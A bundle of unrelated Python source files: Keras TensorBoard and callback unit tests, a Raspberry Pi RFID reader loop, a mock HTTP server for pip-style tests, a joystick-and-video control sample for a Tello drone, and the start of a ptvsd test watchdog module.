model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
callbacks=cbks,
verbose=0)
# fit generator with validation data and accuracy
tsb.histogram_freq = 1
model.fit_generator(
data_generator(True),
len(x_train),
epochs=2,
validation_data=(x_test, y_test),
callbacks=cbks,
verbose=0)
# fit generator without validation data and accuracy
tsb.histogram_freq = 0
model.fit_generator(
data_generator(True), len(x_train), epochs=2, callbacks=cbks)
assert os.path.exists(temp_dir)
@test_util.run_deprecated_v1
def test_TensorBoard_multi_input_output(self):
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
with self.cached_session():
filepath = os.path.join(tmpdir, 'logs')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
def data_generator(train):
if train:
max_batch_index = len(x_train) // BATCH_SIZE
else:
max_batch_index = len(x_test) // BATCH_SIZE
i = 0
while 1:
if train:
# simulate multi-input/output models
yield ([x_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2,
[y_train[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2)
else:
yield ([x_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2,
[y_test[i * BATCH_SIZE: (i + 1) * BATCH_SIZE]] * 2)
i += 1
i %= max_batch_index
inp1 = keras.Input((INPUT_DIM,))
inp2 = keras.Input((INPUT_DIM,))
inp = keras.layers.add([inp1, inp2])
hidden = keras.layers.Dense(2, activation='relu')(inp)
hidden = keras.layers.Dropout(0.1)(hidden)
output1 = keras.layers.Dense(NUM_CLASSES, activation='softmax')(hidden)
output2 = keras.layers.Dense(NUM_CLASSES, activation='softmax')(hidden)
model = keras.models.Model([inp1, inp2], [output1, output2])
model.compile(loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# we must generate new callbacks for each test, as they aren't stateless
def callbacks_factory(histogram_freq):
return [keras.callbacks.TensorBoard(log_dir=filepath,
histogram_freq=histogram_freq,
write_images=True, write_grads=True,
batch_size=5)]
# fit without validation data
model.fit([x_train] * 2, [y_train] * 2, batch_size=BATCH_SIZE,
callbacks=callbacks_factory(histogram_freq=0), epochs=3)
# fit with validation data and accuracy
model.fit([x_train] * 2, [y_train] * 2, batch_size=BATCH_SIZE,
validation_data=([x_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1), epochs=2)
# fit generator without validation data
model.fit_generator(data_generator(True), len(x_train), epochs=2,
callbacks=callbacks_factory(histogram_freq=0))
# fit generator with validation data and accuracy
model.fit_generator(data_generator(True), len(x_train), epochs=2,
validation_data=([x_test] * 2, [y_test] * 2),
callbacks=callbacks_factory(histogram_freq=1))
assert os.path.isdir(filepath)
@test_util.run_deprecated_v1
def test_Tensorboard_histogram_summaries_in_test_function(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
self.steps_seen = []
def add_summary(self, summary, global_step):
summary_obj = summary_pb2.Summary()
# ensure a valid Summary proto is being sent
if isinstance(summary, bytes):
summary_obj.ParseFromString(summary)
else:
assert isinstance(summary, summary_pb2.Summary)
summary_obj = summary
# keep track of steps seen for the merged_summary op,
# which contains the histogram summaries
if len(summary_obj.value) > 1:
self.steps_seen.append(global_step)
def flush(self):
pass
def close(self):
pass
def _init_writer(obj):
obj.writer = FileWriterStub(obj.log_dir)
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
with self.cached_session():
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
# non_trainable_weights: moving_variance, moving_mean
model.add(keras.layers.BatchNormalization())
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
keras.callbacks.TensorBoard._init_writer = _init_writer
tsb = keras.callbacks.TensorBoard(
log_dir=tmpdir,
histogram_freq=1,
write_images=True,
write_grads=True,
batch_size=5)
cbks = [tsb]
# fit with validation data
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=3,
verbose=0)
self.assertAllEqual(tsb.writer.steps_seen, [0, 1, 2, 3, 4, 5])
@test_util.run_deprecated_v1
def test_Tensorboard_histogram_summaries_with_generator(self):
np.random.seed(1337)
tmpdir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, tmpdir, ignore_errors=True)
def generator():
x = np.random.randn(10, 100).astype(np.float32)
y = np.random.randn(10, 10).astype(np.float32)
while True:
yield x, y
with self.cached_session():
model = testing_utils.get_small_sequential_mlp(
num_hidden=10, num_classes=10, input_dim=100)
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
tsb = keras.callbacks.TensorBoard(
log_dir=tmpdir,
histogram_freq=1,
write_images=True,
write_grads=True,
batch_size=5)
cbks = [tsb]
# fit with validation generator
model.fit_generator(
generator(),
steps_per_epoch=2,
epochs=2,
validation_data=generator(),
validation_steps=2,
callbacks=cbks,
verbose=0)
with self.assertRaises(ValueError):
# fit with validation generator but no
# validation_steps
model.fit_generator(
generator(),
steps_per_epoch=2,
epochs=2,
validation_data=generator(),
callbacks=cbks,
verbose=0)
self.assertTrue(os.path.exists(tmpdir))
@unittest.skipIf(
os.name == 'nt',
'use_multiprocessing=True does not work on windows properly.')
def test_LambdaCallback(self):
with self.cached_session():
np.random.seed(1337)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_TensorBoard_with_ReduceLROnPlateau(self):
with self.cached_session():
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='binary_crossentropy', optimizer='sgd', metrics=['accuracy'])
cbks = [
keras.callbacks.ReduceLROnPlateau(
monitor='val_loss', factor=0.5, patience=4, verbose=1),
keras.callbacks.TensorBoard(log_dir=temp_dir)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
assert os.path.exists(temp_dir)
@test_util.run_deprecated_v1
def test_Tensorboard_batch_logging(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
self.batches_logged = []
self.summary_values = []
self.summary_tags = []
def add_summary(self, summary, step):
self.summary_values.append(summary.value[0].simple_value)
self.summary_tags.append(summary.value[0].tag)
self.batches_logged.append(step)
def flush(self):
pass
def close(self):
pass
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='batch')
tb_cbk.writer = FileWriterStub(temp_dir)
for batch in range(5):
tb_cbk.on_batch_end(batch, {'acc': batch})
self.assertEqual(tb_cbk.writer.batches_logged, [0, 1, 2, 3, 4])
self.assertEqual(tb_cbk.writer.summary_values, [0., 1., 2., 3., 4.])
self.assertEqual(tb_cbk.writer.summary_tags, ['batch_acc'] * 5)
@test_util.run_deprecated_v1
def test_Tensorboard_epoch_and_batch_logging(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
def add_summary(self, summary, step):
if 'batch_' in summary.value[0].tag:
self.batch_summary = (step, summary)
elif 'epoch_' in summary.value[0].tag:
self.epoch_summary = (step, summary)
def flush(self):
pass
def close(self):
pass
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='batch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0})
batch_step, batch_summary = tb_cbk.writer.batch_summary
self.assertEqual(batch_step, 0)
self.assertEqual(batch_summary.value[0].simple_value, 5.0)
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='epoch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_epoch_end(0, {'acc': 10.0})
epoch_step, epoch_summary = tb_cbk.writer.epoch_summary
self.assertEqual(epoch_step, 0)
self.assertEqual(epoch_summary.value[0].simple_value, 10.0)
@test_util.run_in_graph_and_eager_modes
def test_Tensorboard_eager(self):
temp_dir = tempfile.mkdtemp(dir=self.get_temp_dir())
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
model = testing_utils.get_small_sequential_mlp(
num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
model.compile(
loss='binary_crossentropy',
optimizer=adam.AdamOptimizer(0.01),
metrics=['accuracy'])
cbks = [keras.callbacks.TensorBoard(log_dir=temp_dir)]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=2,
verbose=0)
self.assertTrue(os.path.exists(temp_dir))
@test_util.run_deprecated_v1
def test_TensorBoard_update_freq(self):
class FileWriterStub(object):
def __init__(self, logdir, graph=None):
self.logdir = logdir
self.graph = graph
self.batch_summaries = []
self.epoch_summaries = []
def add_summary(self, summary, step):
if 'batch_' in summary.value[0].tag:
self.batch_summaries.append((step, summary))
elif 'epoch_' in summary.value[0].tag:
self.epoch_summaries.append((step, summary))
def flush(self):
pass
def close(self):
pass
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
# Epoch mode
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='epoch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 1})
self.assertEqual(tb_cbk.writer.batch_summaries, [])
tb_cbk.on_epoch_end(0, {'acc': 10.0, 'size': 1})
self.assertEqual(len(tb_cbk.writer.epoch_summaries), 1)
# Batch mode
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq='batch')
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 1})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 1)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 1})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 2)
self.assertFalse(tb_cbk.writer.epoch_summaries)
# Integer mode
tb_cbk = keras.callbacks.TensorBoard(temp_dir, update_freq=20)
tb_cbk.writer = FileWriterStub(temp_dir)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertFalse(tb_cbk.writer.batch_summaries)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 1)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 1)
tb_cbk.on_batch_end(0, {'acc': 5.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 2)
tb_cbk.on_batch_end(0, {'acc': 10.0, 'size': 10})
self.assertEqual(len(tb_cbk.writer.batch_summaries), 2)
self.assertFalse(tb_cbk.writer.epoch_summaries)
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
if __name__ == '__main__':
test.main()
|
rfid.py
|
import threading
import server
from api import crud
import sys
import helper
import time
def start_rfid_reader():
print("Starting RFID Reader...")
x = threading.Thread(target=read_rfid_forever, daemon=True)
x.start()
print("Started RFID Reader.")
def read_rfid_forever():
print("Starting read_rfid_forever...")
try:
if helper.running_on_raspberrypi():
from mfrc522 import SimpleMFRC522
reader = SimpleMFRC522()
else:
reader = None
except:
print("'read_rfid_forever' error when initiating RFID reader: ", sys.exc_info()[0])
reader = None
while True:
## loop forever
try:
# Do we even have an RFID reader?
if reader is None:
# Fake it Option - Sleep a while, then pretend somone just scanned RFID - repeatedly....
#time.sleep(15)
#id="225534814579"
# Don't Fake it: No RFID reader so just exit this whole RFID reader code, because it is never going to work
return
else:
id, text = reader.read()
print(f"Read RFID Token:[{id}]")
server.notify_client(id, next(crud.get_db()))
except:
print(f"[ERROR]: ", sys.exc_info()[0])
|
server.py
|
import os
import signal
import ssl
import threading
from base64 import b64encode
from contextlib import contextmanager
from textwrap import dedent
from typing import TYPE_CHECKING, Any, Callable, Dict, Iterable, Iterator
from unittest.mock import Mock
from werkzeug.serving import BaseWSGIServer, WSGIRequestHandler
from werkzeug.serving import make_server as _make_server
from .compat import nullcontext
if TYPE_CHECKING:
from wsgi import StartResponse, WSGIApplication, WSGIEnvironment
Body = Iterable[bytes]
class MockServer(BaseWSGIServer):
mock: Mock = Mock()
# Applies on Python 2 and Windows.
if not hasattr(signal, "pthread_sigmask"):
# We're not relying on this behavior anywhere currently, it's just best
# practice.
blocked_signals = nullcontext
else:
@contextmanager
def blocked_signals() -> Iterator[None]:
"""Block all signals for e.g. starting a worker thread."""
# valid_signals() was added in Python 3.8 (and not using it results
# in a warning on pthread_sigmask() call)
mask: Iterable[int]
try:
mask = signal.valid_signals()
except AttributeError:
mask = set(range(1, signal.NSIG))
old_mask = signal.pthread_sigmask(signal.SIG_SETMASK, mask)
try:
yield
finally:
signal.pthread_sigmask(signal.SIG_SETMASK, old_mask)
class _RequestHandler(WSGIRequestHandler):
def make_environ(self) -> Dict[str, Any]:
environ = super().make_environ()
# From pallets/werkzeug#1469, will probably be in release after
# 0.16.0.
try:
# binary_form=False gives nicer information, but wouldn't be
# compatible with what Nginx or Apache could return.
peer_cert = self.connection.getpeercert(binary_form=True)
if peer_cert is not None:
# Nginx and Apache use PEM format.
environ["SSL_CLIENT_CERT"] = ssl.DER_cert_to_PEM_cert(
peer_cert,
)
except ValueError:
# SSL handshake hasn't finished.
self.server.log("error", "Cannot fetch SSL peer certificate info")
except AttributeError:
# Not using TLS, the socket will not have getpeercert().
pass
return environ
def _mock_wsgi_adapter(
mock: Callable[["WSGIEnvironment", "StartResponse"], "WSGIApplication"]
) -> "WSGIApplication":
"""Uses a mock to record function arguments and provide
the actual function that should respond.
"""
def adapter(environ: "WSGIEnvironment", start_response: "StartResponse") -> Body:
try:
responder = mock(environ, start_response)
except StopIteration:
raise RuntimeError("Ran out of mocked responses.")
return responder(environ, start_response)
return adapter
def make_mock_server(**kwargs: Any) -> MockServer:
"""Creates a mock HTTP(S) server listening on a random port on localhost.
The `mock` property of the returned server provides and records all WSGI
interactions, so one approach to testing could be
server = make_mock_server()
server.mock.side_effects = [
page1,
page2,
]
with server_running(server):
# ... use server...
...
assert server.mock.call_count > 0
call_args_list = server.mock.call_args_list
# `environ` is a dictionary defined as per PEP 3333 with the associated
# contents. Additional properties may be added by werkzeug.
environ, _ = call_args_list[0].args
assert environ["PATH_INFO"].startswith("/hello/simple")
Note that the server interactions take place in a different thread, so you
do not want to touch the server.mock within the `server_running` block.
Note also for pip interactions that "localhost" is a "secure origin", so
be careful using this for failure tests of `--trusted-host`.
"""
kwargs.setdefault("request_handler", _RequestHandler)
mock = Mock()
app = _mock_wsgi_adapter(mock)
server = _make_server("localhost", 0, app=app, **kwargs)
server.mock = mock
return server
@contextmanager
def server_running(server: BaseWSGIServer) -> Iterator[None]:
"""Context manager for running the provided server in a separate thread."""
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
with blocked_signals():
thread.start()
try:
yield
finally:
server.shutdown()
thread.join()
# Helper functions for making responses in a declarative way.
def text_html_response(text: str) -> "WSGIApplication":
def responder(environ: "WSGIEnvironment", start_response: "StartResponse") -> Body:
start_response(
"200 OK",
[
("Content-Type", "text/html; charset=UTF-8"),
],
)
return [text.encode("utf-8")]
return responder
def html5_page(text: str) -> str:
return (
dedent(
"""
<!DOCTYPE html>
<html>
<body>
{}
</body>
</html>
"""
)
.strip()
.format(text)
)
def index_page(spec: Dict[str, str]) -> "WSGIApplication":
def link(name: str, value: str) -> str:
return '<a href="{}">{}</a>'.format(value, name)
links = "".join(link(*kv) for kv in spec.items())
return text_html_response(html5_page(links))
def package_page(spec: Dict[str, str]) -> "WSGIApplication":
def link(name: str, value: str) -> str:
return '<a href="{}">{}</a>'.format(value, name)
links = "".join(link(*kv) for kv in spec.items())
return text_html_response(html5_page(links))
def file_response(path: str) -> "WSGIApplication":
def responder(environ: "WSGIEnvironment", start_response: "StartResponse") -> Body:
size = os.stat(path).st_size
start_response(
"200 OK",
[
("Content-Type", "application/octet-stream"),
("Content-Length", str(size)),
],
)
with open(path, "rb") as f:
return [f.read()]
return responder
def authorization_response(path: str) -> "WSGIApplication":
correct_auth = "Basic " + b64encode(b"USERNAME:PASSWORD").decode("ascii")
def responder(environ: "WSGIEnvironment", start_response: "StartResponse") -> Body:
if environ.get("HTTP_AUTHORIZATION") == correct_auth:
size = os.stat(path).st_size
start_response(
"200 OK",
[
("Content-Type", "application/octet-stream"),
("Content-Length", str(size)),
],
)
else:
start_response(
"401 Unauthorized",
[
("WWW-Authenticate", "Basic"),
],
)
with open(path, "rb") as f:
return [f.read()]
return responder
|
joystick_and_video.py
|
"""
tellopy sample using joystick and video palyer
- you can use PS3/PS4/XONE joystick to controll DJI Tello with tellopy module
- you must install mplayer to replay the video
- Xbox One Controllers were only tested on Mac OS with the 360Controller Driver.
get it here -> https://github.com/360Controller/360Controller'''
"""
import time
import sys
import tellopy
import pygame
import pygame.locals
from subprocess import Popen, PIPE
import threading
import av
import cv2.cv2 as cv2 # for avoidance of pylint error
import numpy
import time
import traceback
class JoystickPS3:
# d-pad
UP = 4 # UP
DOWN = 6 # DOWN
ROTATE_LEFT = 7 # LEFT
ROTATE_RIGHT = 5 # RIGHT
# bumper triggers
TAKEOFF = 11 # R1
LAND = 10 # L1
# UNUSED = 9 #R2
# UNUSED = 8 #L2
# buttons
FORWARD = 12 # TRIANGLE
BACKWARD = 14 # CROSS
LEFT = 15 # SQUARE
RIGHT = 13 # CIRCLE
# axis
LEFT_X = 0
LEFT_Y = 1
RIGHT_X = 2
RIGHT_Y = 3
LEFT_X_REVERSE = 1.0
LEFT_Y_REVERSE = -1.0
RIGHT_X_REVERSE = 1.0
RIGHT_Y_REVERSE = -1.0
DEADZONE = 0.1
class JoystickPS4:
# d-pad
UP = -1 # UP
DOWN = -1 # DOWN
ROTATE_LEFT = -1 # LEFT
ROTATE_RIGHT = -1 # RIGHT
# bumper triggers
TAKEOFF = 5 # R1
LAND = 4 # L1
# UNUSED = 7 #R2
# UNUSED = 6 #L2
# buttons
FORWARD = 3 # TRIANGLE
BACKWARD = 1 # CROSS
LEFT = 0 # SQUARE
RIGHT = 2 # CIRCLE
# axis
LEFT_X = 0
LEFT_Y = 1
RIGHT_X = 2
RIGHT_Y = 3
LEFT_X_REVERSE = 1.0
LEFT_Y_REVERSE = -1.0
RIGHT_X_REVERSE = 1.0
RIGHT_Y_REVERSE = -1.0
DEADZONE = 0.08
class JoystickPS4ALT:
# d-pad
UP = -1 # UP
DOWN = -1 # DOWN
ROTATE_LEFT = -1 # LEFT
ROTATE_RIGHT = -1 # RIGHT
# bumper triggers
TAKEOFF = 5 # R1
LAND = 4 # L1
# UNUSED = 7 #R2
# UNUSED = 6 #L2
# buttons
FORWARD = 3 # TRIANGLE
BACKWARD = 1 # CROSS
LEFT = 0 # SQUARE
RIGHT = 2 # CIRCLE
# axis
LEFT_X = 0
LEFT_Y = 1
RIGHT_X = 3
RIGHT_Y = 4
LEFT_X_REVERSE = 1.0
LEFT_Y_REVERSE = -1.0
RIGHT_X_REVERSE = 1.0
RIGHT_Y_REVERSE = -1.0
DEADZONE = 0.08
class JoystickXONE:
# d-pad
UP = 0 # UP
DOWN = 1 # DOWN
ROTATE_LEFT = 2 # LEFT
ROTATE_RIGHT = 3 # RIGHT
# bumper triggers
TAKEOFF = 9 # RB
LAND = 8 # LB
# UNUSED = 7 #RT
# UNUSED = 6 #LT
# buttons
FORWARD = 14 # Y
BACKWARD = 11 # A
LEFT = 13 # X
RIGHT = 12 # B
# axis
LEFT_X = 0
LEFT_Y = 1
RIGHT_X = 2
RIGHT_Y = 3
LEFT_X_REVERSE = 1.0
LEFT_Y_REVERSE = -1.0
RIGHT_X_REVERSE = 1.0
RIGHT_Y_REVERSE = -1.0
DEADZONE = 0.09
class JoystickTARANIS:
# d-pad
UP = -1 # UP
DOWN = -1 # DOWN
ROTATE_LEFT = -1 # LEFT
ROTATE_RIGHT = -1 # RIGHT
# bumper triggers
TAKEOFF = 12 # left switch
LAND = 12 # left switch
# UNUSED = 7 #RT
# UNUSED = 6 #LT
# buttons
FORWARD = -1
BACKWARD = -1
LEFT = -1
RIGHT = -1
# axis
LEFT_X = 3
LEFT_Y = 0
RIGHT_X = 1
RIGHT_Y = 2
LEFT_X_REVERSE = 1.0
LEFT_Y_REVERSE = 1.0
RIGHT_X_REVERSE = 1.0
RIGHT_Y_REVERSE = 1.0
DEADZONE = 0.01
prev_flight_data = None
run_recv_thread = True
new_image = None
flight_data = None
log_data = None
buttons = None
speed = 100
throttle = 0.0
yaw = 0.0
pitch = 0.0
roll = 0.0
def handler(event, sender, data, **args):
global prev_flight_data
global flight_data
global log_data
drone = sender
if event is drone.EVENT_FLIGHT_DATA:
if prev_flight_data != str(data):
print(data)
prev_flight_data = str(data)
flight_data = data
elif event is drone.EVENT_LOG_DATA:
log_data = data
else:
print('event="%s" data=%s' % (event.getname(), str(data)))
def update(old, new, max_delta=0.3):
if abs(old - new) <= max_delta:
res = new
else:
res = 0.0
return res
def handle_input_event(drone, e):
global speed
global throttle
global yaw
global pitch
global roll
if e.type == pygame.locals.JOYAXISMOTION:
# ignore small input values (Deadzone)
if -buttons.DEADZONE <= e.value and e.value <= buttons.DEADZONE:
e.value = 0.0
if e.axis == buttons.LEFT_Y:
throttle = update(throttle, e.value * buttons.LEFT_Y_REVERSE)
drone.set_throttle(throttle)
if e.axis == buttons.LEFT_X:
yaw = update(yaw, e.value * buttons.LEFT_X_REVERSE)
drone.set_yaw(yaw)
if e.axis == buttons.RIGHT_Y:
pitch = update(pitch, e.value *
buttons.RIGHT_Y_REVERSE)
drone.set_pitch(pitch)
if e.axis == buttons.RIGHT_X:
roll = update(roll, e.value * buttons.RIGHT_X_REVERSE)
drone.set_roll(roll)
elif e.type == pygame.locals.JOYHATMOTION:
if e.value[0] < 0:
drone.counter_clockwise(speed)
if e.value[0] == 0:
drone.clockwise(0)
if e.value[0] > 0:
drone.clockwise(speed)
if e.value[1] < 0:
drone.down(speed)
if e.value[1] == 0:
drone.up(0)
if e.value[1] > 0:
drone.up(speed)
elif e.type == pygame.locals.JOYBUTTONDOWN:
if e.button == buttons.LAND:
drone.land()
elif e.button == buttons.UP:
drone.up(speed)
elif e.button == buttons.DOWN:
drone.down(speed)
elif e.button == buttons.ROTATE_RIGHT:
drone.clockwise(speed)
elif e.button == buttons.ROTATE_LEFT:
drone.counter_clockwise(speed)
elif e.button == buttons.FORWARD:
drone.forward(speed)
elif e.button == buttons.BACKWARD:
drone.backward(speed)
elif e.button == buttons.RIGHT:
drone.right(speed)
elif e.button == buttons.LEFT:
drone.left(speed)
elif e.type == pygame.locals.JOYBUTTONUP:
if e.button == buttons.TAKEOFF:
if throttle != 0.0:
print('###')
print('### throttle != 0.0 (This may hinder the drone from taking off)')
print('###')
drone.takeoff()
elif e.button == buttons.UP:
drone.up(0)
elif e.button == buttons.DOWN:
drone.down(0)
elif e.button == buttons.ROTATE_RIGHT:
drone.clockwise(0)
elif e.button == buttons.ROTATE_LEFT:
drone.counter_clockwise(0)
elif e.button == buttons.FORWARD:
drone.forward(0)
elif e.button == buttons.BACKWARD:
drone.backward(0)
elif e.button == buttons.RIGHT:
drone.right(0)
elif e.button == buttons.LEFT:
drone.left(0)
def draw_text(image, text, row):
font = cv2.FONT_HERSHEY_SIMPLEX
font_scale = 0.5
font_size = 24
font_color = (255,255,255)
bg_color = (0,0,0)
d = 2
height, width = image.shape[:2]
left_mergin = 10
if row < 0:
pos = (left_mergin, height + font_size * row + 1)
else:
pos = (left_mergin, font_size * (row + 1))
cv2.putText(image, text, pos, font, font_scale, bg_color, 6)
cv2.putText(image, text, pos, font, font_scale, font_color, 1)
def recv_thread(drone):
global run_recv_thread
global new_image
global flight_data
global log_data
print('start recv_thread()')
try:
container = av.open(drone.get_video_stream())
# skip first 300 frames
frame_skip = 300
while True:
for frame in container.decode(video=0):
if 0 < frame_skip:
frame_skip = frame_skip - 1
continue
start_time = time.time()
image = cv2.cvtColor(numpy.array(frame.to_image()), cv2.COLOR_RGB2BGR)
if flight_data:
draw_text(image, 'TelloPy: joystick_and_video ' + str(flight_data), 0)
if log_data:
draw_text(image, 'MVO: ' + str(log_data.mvo), -3)
draw_text(image, ('IMU: ' + str(log_data.imu))[0:52], -2)
draw_text(image, ' ' + ('IMU: ' + str(log_data.imu))[52:], -1)
new_image = image
if frame.time_base < 1.0/60:
time_base = 1.0/60
else:
time_base = frame.time_base
frame_skip = int((time.time() - start_time)/time_base)
except Exception as ex:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
print(ex)
def main():
global buttons
global run_recv_thread
global new_image
pygame.init()
pygame.joystick.init()
current_image = None
try:
js = pygame.joystick.Joystick(0)
js.init()
js_name = js.get_name()
print('Joystick name: ' + js_name)
if js_name in ('Wireless Controller', 'Sony Computer Entertainment Wireless Controller'):
buttons = JoystickPS4
elif js_name == 'Sony Interactive Entertainment Wireless Controller':
buttons = JoystickPS4ALT
elif js_name in ('PLAYSTATION(R)3 Controller', 'Sony PLAYSTATION(R)3 Controller'):
buttons = JoystickPS3
elif js_name == 'Xbox One Wired Controller':
buttons = JoystickXONE
elif js_name == 'FrSky Taranis Joystick':
buttons = JoystickTARANIS
except pygame.error:
pass
if buttons is None:
print('no supported joystick found')
return
drone = tellopy.Tello()
drone.connect()
drone.subscribe(drone.EVENT_FLIGHT_DATA, handler)
drone.subscribe(drone.EVENT_LOG_DATA, handler)
threading.Thread(target=recv_thread, args=[drone]).start()
try:
while 1:
# loop with pygame.event.get() is too much tight w/o some sleep
time.sleep(0.01)
for e in pygame.event.get():
handle_input_event(drone, e)
if current_image is not new_image:
cv2.imshow('Tello', new_image)
current_image = new_image
cv2.waitKey(1)
except KeyboardInterrupt as e:
print(e)
except Exception as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
traceback.print_exception(exc_type, exc_value, exc_traceback)
print(e)
run_recv_thread = False
cv2.destroyAllWindows()
drone.quit()
exit(1)
if __name__ == '__main__':
main()
|
__init__.py
|
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See LICENSE in the project root
# for license information.
from __future__ import absolute_import, division, print_function, unicode_literals
"""A watchdog process for debuggee processes spawned by tests.
Interacts with the main test runner process over stdio, and keeps track of running
ptvsd processes. If the test runner process goes down, any ptvsd test processes
are automatically killed.
"""
__all__ = ["start", "register_spawn", "unregister_spawn"]
import atexit
import os
